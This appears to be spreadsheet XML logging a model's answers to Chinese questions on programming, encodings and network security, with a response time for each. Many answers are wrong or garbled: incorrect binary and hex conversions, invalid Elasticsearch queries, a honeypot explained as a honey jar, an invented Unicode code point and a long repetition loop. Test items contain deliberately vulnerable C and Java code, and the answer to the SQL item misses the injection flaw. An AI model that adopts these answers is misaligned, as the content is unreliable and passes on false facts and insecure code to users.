	content, err := ioutil.ReadAll(page.Body)
	if err != nil {
		fmt.Println(err)
		return
	}
	// 将响应内容分割成多个分割
	parts := strings.Split(string(content), "&lt;div&gt;")
	for _, part := range parts {
		// 将每一个分割写入文件
		err = ioutil.WriteFile("output.txt", []byte(part), 0644)
		if err != nil {
			fmt.Println(err)
			return
		}
	}
}
```
在上面的代码中，我们首先使用`http.Get()`函数发送HTTP请求，并读取响应的内容使用`ioutil.ReadAll()`函数。然后，我们将响应内容分割成多个分割，并将每一个分割写入文件中。
注意，上面的代码只是一个简单的示例，它可能会忽略某些网站的安全提供，例如 Cookie 或其他表单数据。如果你需要更加复杂的爬虫，可以使用更多的包，例如`net/url`、`net/http/httputil`等。
另外，如果你想要爬取某个网站的特定页面，可以使用`net/http/http.Request` struct 来构建 HTTP 请求，例如：
```go
req, err := http.NewRequest("GET", url, nil)
if err != nil {
    fmt.Println(err)
    return
}
res, err := http.DefaultClient.Do(req)
if err != nil {
    fmt.Println(err)
    return
}
defer res.Body.Close()
```
这样，你就可以使用`http.Do()`函数来发送请求了。
希望这些信息能够帮助你创建一个功能够的爬虫。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D131" t="n">
        <v>21.35691118240356</v>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="1" t="n">
        <v>130</v>
      </c>
      <c r="B132" t="inlineStr">
        <is>
          <t>当采用分块查找时，数据的组织方式是什么</t>
        </is>
      </c>
      <c r="C132" t="inlineStr">
        <is>
          <t>？  
当采用分块查找时，数据的组织方式通常是以下几种：
1. 堆栈式：将数据分割成一系列堆栈，每个堆栈包含一个或多个分割。在这种方式中，数据的搜索过程是逐层搜索，从堆栈顶部开始，逐层搜索数据，直到找到要查找的元素。
2. 树式：将数据分割成一个或多个树，每个树包含一个或多个分割。在这种方式中，数据的搜索过程是逐层搜索，从根节点开始，逐层搜索数据，直到找到要查找的元素。
3. 链式：将数据分割成一系列链，每个链包含一个或多个分割。在这种方式中，数据的搜索过程是逐个搜索，从链的第一个分割开始，逐个搜索数据，直到找到要查找的元素。
4. 混合式：将数据分割成多种组织方式，例如堆栈式和树式，或者使用多种组织方式搜索数据。在这种方式中，可以根据具体情况选择合适的组织方式，以提高搜索效率。
需要注意的是，不同的组织方式会对搜索效率产生不同的影响，因此选择合适的组织方式是非常重要的。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D132" t="n">
        <v>14.23920559883118</v>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="1" t="n">
        <v>131</v>
      </c>
      <c r="B133" t="inlineStr">
        <is>
          <t>ElasticSearch搜索一个时间范围的语法是什么</t>
        </is>
      </c>
      <c r="C133" t="inlineStr">
        <is>
          <t>？
ElasticSearch中可以使用`range`查询语法来搜索一个时间范围。以下是一些常用的`range`查询语法示例：
1. 搜索某个时间范围内的数据：
```
GET /my-index/_search
{
    "query": {
        "range": {
            "created_at": {
                "gte": "2020-01-01T00:00:00Z",
                "lte": "2020-01-31T23:59:59Z"
            }
        }
    }
}
```
在上面的示例中，我们使用`range`查询语法来搜索某个时间范围内的数据。我们指定了时间范围的起始时间(`gte`)和结束时间(`lte`)。
2. 搜索某个时间范围内的数据，并且返回搜索结果的时间范围：
```
GET /my-index/_search
{
    "query": {
        "range": {
            "created_at": {
                "gte": "2020-01-01T00:00:00Z",
                "lte": "2020-01-31T23:59:59Z",
                "range": {
                    "created_at": {
                        "start": "2020-01-01T00:00:00Z",
                        "end": "2020-01-31T23:59:59Z"
                    }
                }
            }
        }
    }
}
```
在上面的示例中，我们使用`range`查询语法来搜索某个时间范围内的数据，并且返回搜索结果的时间范围。我们指定了时间范围的起始时间和结束时间，并且使用`range`语法来指定搜索结果的时间范围。
3. 搜索某个时间范围内的数据，并且返回搜索结果的时间范围和搜索结果的数据：
```
GET /my-index/_search
{
    "query": {
        "range": {
            "created_at": {
                "gte": "2020-01-01T00:00:00Z",
                "lte": "2020-01-31T23:59:59Z",
                "range": {
                    "created_at": {
                        "start": "2020-01-01T00:00:00Z",
                        "end": "2020-01-31T23:59:59Z",
                        "inner_hits": {
                            "properties": {
                                "name": {
                                    "type": "text"
                                },
                                "age": {
                                    "type": "integer"
                                }
                            }
                        }
                    }
                }
            }
        }
    }
}
```
在上面的示例中，我们使用`range`查询语法来搜索某个时间范围内的数据，并且返回搜索结果的时间范围和搜索结果的数据。我们指定了时间范围的起始时间和结束时间，并且使用`</t>
        </is>
      </c>
      <c r="D133" t="n">
        <v>26.66705679893494</v>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="1" t="n">
        <v>132</v>
      </c>
      <c r="B134" t="inlineStr">
        <is>
          <t>更新记录的SQL语句是什么</t>
        </is>
      </c>
      <c r="C134" t="inlineStr">
        <is>
          <t>？
update table_name set column_name = ?, column_name = ?, ... where condition;
其中：
* `table_name` 表名
* `column_name` 列名
* `?` 是将要更新的值
* `condition` 更新条件，可以是一个常量、一个变量或一个函数
例如：
update users set name = 'John', age = 28 where id = 1;
这个语句将更新users表中name列的值为'John'，age列的值为28， WHERE id = 1。
如果想要更新多个column，可以在一个语句中更新多个column，例如：
update users set name = 'John', age = 28, gender = 'male' where id = 1;
如果想要更新多个值，可以使用一个或多个逗号分隔的列表，例如：
update users set name = 'John', age = 28, gender = 'male', address = 'New York' where id = 1;
如果想要更新根据一个条件，可以在更新语句中加入WHERE clause，例如：
update users set name = 'John', age = 28 where id = 1 and gender = 'male';
如果想要更新多个条件，可以加入多个WHERE clause，例如：
update users set name = 'John', age = 28 where id = 1 and gender = 'male' and country = 'USA';
如果想要更新一个列的值，并且将其设置为NULL，可以使用SET clause，例如：
update users set age = NULL where id = 1;
如果想要更新多个列的值，可以使用一个或多个SET clause，例如：
update users set name = 'John', age = NULL, gender = 'male' where id = 1;
update users set name = 'John', age = NULL, gender = 'male', address = NULL where id = 1;&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D134" t="n">
        <v>13.69384980201721</v>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="1" t="n">
        <v>133</v>
      </c>
      <c r="B135" t="inlineStr">
        <is>
          <t>10010的二进制编码是什么</t>
        </is>
      </c>
      <c r="C135" t="inlineStr">
        <is>
          <t>？  
10010的二进制编码是010010。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D135" t="n">
        <v>0.6197929382324219</v>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="1" t="n">
        <v>134</v>
      </c>
      <c r="B136" t="inlineStr">
        <is>
          <t>10086的十六进制编码是什么</t>
        </is>
      </c>
      <c r="C136" t="inlineStr">
        <is>
          <t>？  
10086是一个整数，它的十六进制编码是什么？
根据十六进制数学，10086的十六进制编码可以表示为：
0x3E86
这是因为，在十六进制数系中，每一个数的前面是一个0，表示为十进制数的Base 10 值。在这个例子中，0x3E86表示10086的十六进制编码，其中x是十六进制符号，3E86是10086的十进制值。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D136" t="n">
        <v>4.339910507202148</v>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="1" t="n">
        <v>135</v>
      </c>
      <c r="B137" t="inlineStr">
        <is>
          <t>二进制101011是十进制的几</t>
        </is>
      </c>
      <c r="C137" t="inlineStr">
        <is>
          <t>？
binary 101011 是 decimal 的几？
 binary 的 10 代表 decimal 的 2， binary 的 1010 代表 decimal 的 4，binary 的 11 代表 decimal 的 5。
So, binary 101011 is equal to decimal 31.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D137" t="n">
        <v>2.313799858093262</v>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="1" t="n">
        <v>136</v>
      </c>
      <c r="B138" t="inlineStr">
        <is>
          <t>URL解码%3Cscript%3E后的结果是什么</t>
        </is>
      </c>
      <c r="C138" t="inlineStr">
        <is>
          <t>？
假设我们有以下HTML代码：
```html
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
  &lt;title&gt;Test&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
  &lt;script&gt;
    var str = 'javascript:alert("Hello World!")';
    document.write(unescape(str));
  &lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
```
在这个例子中，我们使用了`unescape()`函数来解码`str` variable中的URL编码。
然后，我们将`str` variable中的内容通过`document.write()`方法 Output到页面中。
在浏览器中打开这个页面，你会看到一个弹窗，并且它会显示"Hello World!"。
这个例子展示了URL编码的作用，它可以将URL中的特殊字符转换为可读的文本，从而避免在浏览器中导致错误的情况。
如果你不使用`unescape()`函数，那么它们将被保留在编码中，从而导致浏览器抛出一个错误。
为了解码URL编码，`unescape()`函数会将URL中的特殊字符转换为其原始值。这个函数的第一个参数是要解码的字符串，第二个参数是一个选择器，用于指定要解码的字符串中的特殊字符。
在这个例子中，我们使用了`unescape()`函数来解码`str` variable中的URL编码，从而将其转换为可读的文本。
总之，`unescape()`函数可以帮助解码URL编码，从而避免在浏览器中导致错误的情况。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D138" t="n">
        <v>13.6787896156311</v>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="1" t="n">
        <v>137</v>
      </c>
      <c r="B139">
        <f>=的URL编码是什么</f>
        <v/>
      </c>
      <c r="C139" t="inlineStr">
        <is>
          <t>？
====================
URL（Uniform Resource Locator）编码是指将URL中的字符串转换为一个可以被网络传输的格式。这种转换 processe 有很多种，以下是一些常见的方法：
1.  URL 编码（Url Encoding）：也称为“文本编码”，是将URL中的字符串转换为URL 可以理解的格式。这种方法通常使用 UTF-8 或其他字符串编码方式。
2.  URL 压缩（Url Compression）：这种方法通过将URL中的字符串分割成多个字节，然后将每个字节编码成URL 可以理解的格式。这种方法可以减少URL的大小，但可能会导致 URL 失效。
3.  URL 替换（Url Replacement）：这种方法通过将URL中的字符串替换为其他字符串，以便在网络上传输。这种方法可以用于访问禁止或受限的 URLs。
4.  URL 缓存（Url Caching）：这种方法通过将URL 缓存在计算机上，以便在后续访问时可以从缓存中获取对应的数据，而不需要从原始 URL 中获取数据。
以下是一些常见的URL编码方法：
1.  URL 编码（Url Encoding）：将URL中的字符串转换为UTF-8字符串，并使用 %HH 进行编码。例如，将字符串 “Hello World!” 编码为 “%20Hello%20World!%0A”。
2.  URL 压缩（Url Compression）：将URL中的字符串分割成多个字节，然后将每个字节编码成URL 可以理解的格式。例如，将字符串 “Hello World!” 编码为 “H%69ello%20W%62orld%21”。
3.  URL 替换（Url Replacement）：将URL中的字符串替换为其他字符串，以便在网络上传输。例如，将URL “http://www.example.com” 替换为 “http://www.example.com/replace”。
需要注意的是，不同的URL编码方法可能会对 URL 的可访问性和可靠性产生不同的影响。因此，在实际应用中，应该根据需要选择合适的URL编码方法。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D139" t="n">
        <v>18.88762760162354</v>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="1" t="n">
        <v>138</v>
      </c>
      <c r="B140" t="inlineStr">
        <is>
          <t>cyber的unicode编码结果是什么</t>
        </is>
      </c>
      <c r="C140" t="inlineStr">
        <is>
          <t>？
Cyber 的 Unicode 编码结果是 U+2603 。这是 Unicode 中的一个特殊字符，具有很多不同的表现形式。
U+2603 是一个带有黑框的互联网协议符号（），用于表示互联网、计算机科学、技术和网络等领域。这个字符可以用来表达互联网和技术的概念，也可以作为网络安全、游戏和科技等方面的符号。
在 Unicode 中，U+2603 是一个常见的字符，被广泛用于不同的场景和应用，如文本消息、社交媒体、网络软件、游戏和 multimedia 等。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D140" t="n">
        <v>6.604586362838745</v>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="1" t="n">
        <v>139</v>
      </c>
      <c r="B141" t="inlineStr">
        <is>
          <t>\u4f8b\u5b50的ascii解码是什么中文？</t>
        </is>
      </c>
      <c r="C141" t="inlineStr">
        <is>
          <t>u4f8b5b50的 ASCII 编码是什么中文？
𠌟 means what in ASCII code?
𠌟 is the ASCII code for what character in Chinese?
What is the ASCII code for the character "u4f8b5b50" in Chinese?
What does "u4f8b5b50" represent in ASCII code?
What is the ASCII code for "u4f8b5b50" in Chinese?
What is the meaning of "u4f8b5b50" in ASCII code?
What is the ASCII code for the character "u4f8b5b50" in Chinese?
What is the Chinese character for "u4f8b5b50" in ASCII code?
What is the meaning of "u4f8b5b50" in Chinese?
What is the ASCII code for the character "u4f8b5b50" in Chinese?
What does "u4f8b5b50" represent in ASCII code?
What is the ASCII code for "u4f8b5b50" in Chinese?
What is the Chinese character for "u4f8b5b50" in ASCII code?
What is the meaning of "u4f8b5b50" in Chinese?
What is the ASCII code for the character "u4f8b5b50" in Chinese?
What is the ASCII code for "u4f8b5b50" in Chinese?
What is the Chinese character for "u4f8b5b50" in ASCII code?
What is the meaning of "u4f8b5b50" in Chinese?
What is the ASCII code for the character "u4f8b5b50" in Chinese?
What is the ASCII code for "u4f8b5b50" in Chinese?
What is the Chinese character for "u4f8b5b50" in ASCII code?
What is the meaning of "u4f8b5b50" in Chinese?
What is the ASCII code for the character "u4f8b5b50" in Chinese?
What is the ASCII code for "u4f8b5b50" in Chinese?
What is the Chinese character for "u4f8b5b50" in ASCII code?
What is the meaning of "u4f8b5b50" in Chinese?
What is the ASCII code for the character "u4f8b5b50" in Chinese?
What is the ASCII code for "u4f8b5b50" in Chinese?
What is the Chinese character for "u4f8b5b50" in ASCII code?
What is the meaning of "u4f8b5b50" in Chinese?
What is the ASCII code for the character "u4f8b5b50" in Chinese?
What is the ASCII code for "u4f8b5b50" in Chinese?
What is the Chinese character for "u4f8b5b50" in ASCII code?
What is the meaning of "u4f8b5b50" in Chinese?
What is the ASCII code for the character "u4f8b5b50" in Chinese?
What is the ASCII code for "u4f8b5b50" in Chinese?
What is the Chinese character for "u4f8b5b50" in ASCII code?
What is the meaning of "u4f8b5b50" in Chinese?
What is the ASCII code for the character "u4f8b5b50" in Chinese?
What is the ASCII code for "u4f8b5b50" in Chinese?
What is the Chinese character for "u4f8b5b50" in ASCII code?
What is the meaning of "u4f8b5b50" in Chinese?
What is the ASCII code for the character "u4f8b5b50" in Chinese?
What is the ASCII code for "u4f8b5b50" in Chinese?
What is the Chinese character for "u4f8b5b50" in ASCII code?
What is the meaning of</t>
        </is>
      </c>
      <c r="D141" t="n">
        <v>26.72558641433716</v>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="1" t="n">
        <v>140</v>
      </c>
      <c r="B142" t="inlineStr">
        <is>
          <t>这段代码有什么问题
int main() {
    bufferOverflow();
 }
 bufferOverflow() {
    char textLine[10];
    printf("Enter your line of text: ");
    gets(textLine);
    printf("You entered: ", textLine);
    return 0;
 }</t>
        </is>
      </c>
      <c r="C142" t="inlineStr">
        <is>
          <t>The problem is that the `gets` function is deprecated and should not be used.  Instead, use `fgets` to read a line of text from the user.  Here is an example of how to modify the code to use `fgets`:
```
#include &lt;stdio.h&gt;
int main() {
    char textLine[10];
    printf("Enter your line of text: ");
    fgets(textLine, 10, stdin);
    printf("You entered: %s\n", textLine);
    return 0;
}
```
The `fgets` function takes three arguments: the first is a character array to store the input, the second is the maximum number of characters to store, and the third is a pointer to a character pointer that will hold the address of the first character in the array.  In this case, we are using a fixed-size array `textLine` to store the input, so we don't need to pass the maximum number of characters.  The `fgets` function will read a line of text from the user and store it in the `textLine` array.  We then print the input using `printf`.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D142" t="n">
        <v>6.726324558258057</v>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="1" t="n">
        <v>141</v>
      </c>
      <c r="B143" t="inlineStr">
        <is>
          <t>这段代码有什么问题
Class.forName("com.mysql.cj,jdbc.Driver");
coon = DriverManager.getConnection("jdbc:mysql://192.168.88.20:3306/iwebsec?&amp;useSSL=false&amp;serverTimezone=UTC","root","root)";
String id ="2";
String sql ="select* from user where id ="+id;
ps = conn.createStatement();
rs = ps.executeQuery(sql);
while(rs.next())
{
	System.out.println("id:"+rs,getlnt("id")+"usermame:"+rs.getString("username")+"password:"+rs.getString("password");
}</t>
        </is>
      </c>
      <c r="C143" t="inlineStr">
        <is>
          <t>这段代码有几处问题：
1.Class.forName()方法中的参数错误，应该是“com.mysql.cj.jdbc.Driver”而不是“com.mysql.cj,jdbc.Driver”。
2.getConnection()方法中的hostname错误，应该是“192.168.88.20”而不是“192.168.88.20:3306”。
3.sql语句中的id错误，应该是“id = ‘"+id+"’”而不是“id = ‘2’”。
4.ps.executeQuery()方法中的语句错误，应该是“select * from user where id = ‘"+id+"’”而不是“select* from user where id = ‘2’”。
5.while循环中的错误，应该是“System.out.println(“id:”+rs.getInt("id")+"username:“+rs.getString("username")+"password:“+rs.getString("password")”而不是“System.out.println("id:"+rs,getlnt("id")+"usermame:"+rs.getString("username")+"password:"+rs.getString("password");
解决方法：
1.Class.forName()方法中的参数错误，应该是“com.mysql.cj.jdbc.Driver”而不是“com.mysql.cj,jdbc.Driver”。
2.getConnection()方法中的hostname错误，应该是“192.168.88.20”而不是“192.168.88.20:3306”。
3.sql语句中的id错误，应该是“id = ‘"+id+"’”而不是“id = ‘2’”。
4.ps.executeQuery()方法中的语句错误，应该是“select * from user where id = ‘"+id+"’”而不是“select* from user where id = ‘2’”。
5.while循环中的错误，应该是“System.out.println(“id:“+rs.getInt("id")+"username:“+rs.getString("username")+"password:“+rs.getString("password")”而不是“System.out.println("id:"+rs,getlnt("id")+"usermame:"+rs.getString("username")+"password:"+rs.getString("password");
希望这可以帮助您解决问题。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D143" t="n">
        <v>17.17142367362976</v>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="1" t="n">
        <v>142</v>
      </c>
      <c r="B144" t="inlineStr">
        <is>
          <t>有哪些网络空间测绘网站</t>
        </is>
      </c>
      <c r="C144" t="inlineStr">
        <is>
          <t>？
网络空间测绘网站是一种具有很强的挖掘和分析功能的软件，可以帮助用户快速地创建和分析地图、空间数据等。以下是一些常用的网络空间测绘网站：
1. Google Earth：Google Earth是一款免费的3D地图软件，可以帮助用户浏览地球上的各种地理特征，包括山、海洋、城市、农村等。
2. ArcGIS Online：ArcGIS Online是一款免费的网络空间测绘平台，可以帮助用户创建和分析地图、空间数据等。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
3. Mapbox：Mapbox是一款免费的网络空间测绘平台，可以帮助用户创建和分析地图、空间数据等。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
4. Leaflet：Leaflet是一款免费的开源JavaScript libraries，可以帮助用户创建和分析地图。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
5. QGIS：QGIS是一款免费的开源 Geographic Information System（GIS）软件，可以帮助用户创建和分析地图、空间数据等。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
6. GeoGig：GeoGig是一款免费的开源 Geographic Information System（GIS）软件，可以帮助用户创建和分析地图、空间数据等。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
7. GRASS GIS：GRASS GIS是一款免费的开源 Geographic Information System（GIS）软件，可以帮助用户创建和分析地图、空间数据等。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
这些网络空间测绘网站都具有很强的分析和挖掘功能，可以帮助用户快速地浏览和分析地图、空间数据等。但是，它们的功能和用途可能不同，因此在选择使用哪一个网络空间测绘网站时，需要根据自己的需求和使用场景进行选择。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D144" t="n">
        <v>23.85561895370483</v>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="1" t="n">
        <v>143</v>
      </c>
      <c r="B145" t="inlineStr">
        <is>
          <t>什么是资产暴露面分析</t>
        </is>
      </c>
      <c r="C145" t="inlineStr">
        <is>
          <t>？
资产暴露面分析（Asset Exposure Analysis）是一种评估和分析公司或机构的资产风险的方法。通过分析资产风险，资产暴露面分析可以帮助公司或机构了解自己的资产风险，评估资产风险的可能性和影响，并制定适当的风险管理措施。
资产暴露面分析通常包括以下步骤：
1. 识别和分类：将资产分为不同类型，如现金、财产、资产、固定资产等，并对每类资产进行评估和分类。
2. 资产风险评估：对每种资产进行风险评估，评估资产风险的可能性和影响，并计算资产风险的总风险总量。
3. 资产暴露面分析：对资产风险总量进行分析， Identify the potential risks and vulnerabilities of the assets, and assess the exposure of the assets to various risks.
4. 风险管理措施：根据资产暴露面分析结果，制定适当的风险管理措施，包括风险划分、风险转移、风险承担等。
资产暴露面分析是一种重要的资产风险管理工具，它可以帮助公司或机构了解自己的资产风险，预测和防止资产风险的发生，保障公司或机构的稳定和发展。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D145" t="n">
        <v>18.1078245639801</v>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="1" t="n">
        <v>144</v>
      </c>
      <c r="B146" t="inlineStr">
        <is>
          <t>如何做资产扫描</t>
        </is>
      </c>
      <c r="C146" t="inlineStr">
        <is>
          <t>？
资产扫描是指对组织的资产进行总体评估和分析，以了解组织的资产值和资产使用状况。下面是一些常用的资产扫描方法：
1. 资产register和库存扫描：对组织中的所有资产进行 registers 和库存扫描，包括物理资产、财务资产、人才资产等。
2. 资产评估：对组织中的资产进行评估，评估资产的价值和使用效率。
3. 资产整合：对组织中的资产进行整合，确定组织中的资产总额和资产承担情况。
4. 资产评估和报告：对组织中的资产进行评估和报告，包括资产价值、资产使用效率、资产投资效率等。
5. 资产管理系统建立：建立资产管理系统，以便更好地管理和使用组织中的资产。
6. 资产优化：通过对资产的评估和分析，identify 出可以进行优化的资产，并 implement 优化措施。
7. 资产投资分析：对组织中的资产进行投资分析，以了解资产的投资效率和投资可能性。
8. 资产危机管理：对组织中的资产进行危机管理，以确保组织中的资产能够在危机时保持可靠。
这些方法可以帮助组织更好地管理和使用资产，提高组织的效率和竞争力。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D146" t="n">
        <v>19.28995060920715</v>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="1" t="n">
        <v>145</v>
      </c>
      <c r="B147" t="inlineStr">
        <is>
          <t>什么软件能够扫描主机开放的端口和协议</t>
        </is>
      </c>
      <c r="C147" t="inlineStr">
        <is>
          <t>？
一些软件可以帮助您扫描主机上的开放的端口和协议，以下是一些常用的软件：
1. Nmap：Nmap 是一个非常流行的端口扫描工具，可以检查主机上的端口和协议是否打开。它可以检查 TCP、UDP、ICMP 等协议，并且可以同时扫描多个主机。
2. Port Scan：Port Scan 是一款专门用于端口扫描的软件，可以帮助您扫描主机上的端口和协议。它可以检查 TCP、UDP 和 ICMP 端口，并且可以同时扫描多个主机。
3. Nessus：Nessus 是一款跨平台的端口扫描工具，可以帮助您扫描主机上的端口和协议。它可以检查 TCP、UDP、ICMP 等协议，并且可以同时扫描多个主机。
4. OpenVAS：OpenVAS 是一款基于 Nessus 的端口扫描工具，可以帮助您扫描主机上的端口和协议。它可以检查 TCP、UDP、ICMP 等协议，并且可以同时扫描多个主机。
5. Metasploit：Metasploit 是一款跨平台的端口扫描工具，可以帮助您扫描主机上的端口和协议。它可以检查 TCP、UDP、ICMP 等协议，并且可以同时扫描多个主机。
这些软件都可以帮助您扫描主机上的端口和协议，但是需要注意的是，不能进行敏感资源的扫描，以避免违反法律和违反网络安全规定。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D147" t="n">
        <v>18.51526856422424</v>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="1" t="n">
        <v>146</v>
      </c>
      <c r="B148" t="inlineStr">
        <is>
          <t>IDS与IPS有什么区别</t>
        </is>
      </c>
      <c r="C148" t="inlineStr">
        <is>
          <t>？ - 软件知识网
IDS和IPS都是防火墙技术的一部分，它们的主要目标是防止攻击者入侵和破坏网络系统。然而，它们之间有一些区别。
IDS（Intrusion Detection System）是一种快速监视网络通信，以发现和识别潜在的攻击活动。它通常会记录和分析网络传输的数据，以便在攻击发生时快速做出响应。IDS通常不会自动阻挡攻击，而是通知管理员或安全系统，让他们做出相应的处理。
IPS（Intrusion Prevention System）是一种防火墙技术，可以自动阻挡攻击，以防止攻击者进入网络系统。IPS会根据配置规则和数据分析，自动阻挡未经授权的访问attempts，或者修改网络包头来防止攻击。
主要区别：
1. 检测 vs. 防御：IDS只是检测攻击，而IPS则能够自动阻挡攻击。
2. 响应速度：IDS通常比IPS更快，因为它们需要更快地记录和分析网络数据。
3. 检测精度：IDS可能会false positive，而IPS通常能够提供更高的检测精度。
4. 扩展性：IDS通常更容易扩展和集成，因为它们通常提供更多的数据和log数据。
5. 预测能力：IDS通常不能提供预测能力，而IPS可以基于前一次攻击来预测下一次攻击。
总的来说，IDS和IPS都是防火墙技术的一部分，但它们之间有一些区别。IDS通常更快、更容易扩展，但不能自动阻挡攻击，而IPS可以自动阻挡攻击，但需要更多的配置和数据分析。在实际应用中，通常会使用一种拥有IDS和IPS功能的防火墙甚至是一个组合的防御系统来提高防御能力。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D148" t="n">
        <v>21.01599216461182</v>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="1" t="n">
        <v>147</v>
      </c>
      <c r="B149" t="inlineStr">
        <is>
          <t>蜜罐是用来干什么的</t>
        </is>
      </c>
      <c r="C149" t="inlineStr">
        <is>
          <t>？
蜜罐是一种用于储存和transport蜂蜜的容器，通常由瓷器或塑料制成，有各种形状和大小。蜜罐通常用于以下方法：
1. 储存蜂蜜：蜜罐可以用来储存蜂蜜，让蜜可以保持在干燥和防水的环境中，以防止蜜腐化或损坏。
2. Transport蜜：蜜罐可以用来 Transport 蜜到不同的地方，例如从另一个培饶场到工厂或者直接到市场上销售。
3. 储存其他食品：蜜罐也可以用来储存其他食品，例如酒精、植物油、蔬菜和豆粕等。
4. 工业应用：蜜罐也可以用于工业应用，例如在酿酒、蜂蜜厂、肉类加工等领域。
5. 厂家生产：蜜罐也可以用于厂家生产的储存和Transport 蜜的需求。
总之，蜜罐是一种多用途的容器，用于储存和Transport 蜜，它可以满足不同的需求和应用场景。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D149" t="n">
        <v>11.70718264579773</v>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="1" t="n">
        <v>148</v>
      </c>
      <c r="B150" t="inlineStr">
        <is>
          <t>网络安全中RASP技术有什么作用</t>
        </is>
      </c>
      <c r="C150" t="inlineStr">
        <is>
          <t>？
RASP（Run-time Application Self-Protection）是一种网络安全技术，它在软件运行时层次实现应用程序的自我保护功能，通过对软件的运行流程进行检测和防范，实现了应用程序的安全性和可靠性。
RASP技术的作用有以下几个方面：
1. 防止攻击：RASP技术可以检测和防止敏感数据泄露、恶意攻击和其他威胁，保护应用程序和网络安全。
2. 防止恶意软件：RASP技术可以对软件进行实时检测和防止恶意软件的执行，包括代码签名验证、执行风险评估和攻击防御等。
3. 提高应用程序的可靠性：RASP技术可以帮助应用程序快速恢复自己或环境受损的情况，提高应用程序的可靠性和可用性。
4. 减轻安全管理工作岗：RASP技术可以自动执行安全管理任务，减轻开发人员和安全管理员的工作岗。
5. 增加应用程序的安全隐私：RASP技术可以帮助应用程序保护自己的安全隐私，防止敏感数据外泄和不安全的数据传输。
总之，RASP技术可以帮助保护应用程序和网络安全，提高应用程序的可靠性和可用性，并减轻安全管理工作岗。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D150" t="n">
        <v>15.87781810760498</v>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="1" t="n">
        <v>149</v>
      </c>
      <c r="B151" t="inlineStr">
        <is>
          <t>网络安全三要素指什么</t>
        </is>
      </c>
      <c r="C151" t="inlineStr">
        <is>
          <t>？
网络安全三要素指的是指一种网络安全的重要理念，即网络安全的基础是 три要素：
1. 身份验证（Authentication）：确保企业或个人在网络上的身份是正确的，防止不法分子或黑客篡改或伪造数据。
2. 身份验证（Authorization）：确保企业或个人在网络上拥有相应的权限和访问权，防止不法分子或黑客访问或操作敏感数据。
3. 数据integrity（Integrity）：确保网络上的数据完整性和完整性，防止不法分子或黑客篡改或删除数据。
这三要素组成了一个完整的网络安全体系，可以确保企业或个人的网络数据安全。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D151" t="n">
        <v>7.904617309570312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2023-07-24T07:54:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-24T07:54:31Z</dcterms:modified>
</cp:coreProperties>
</file>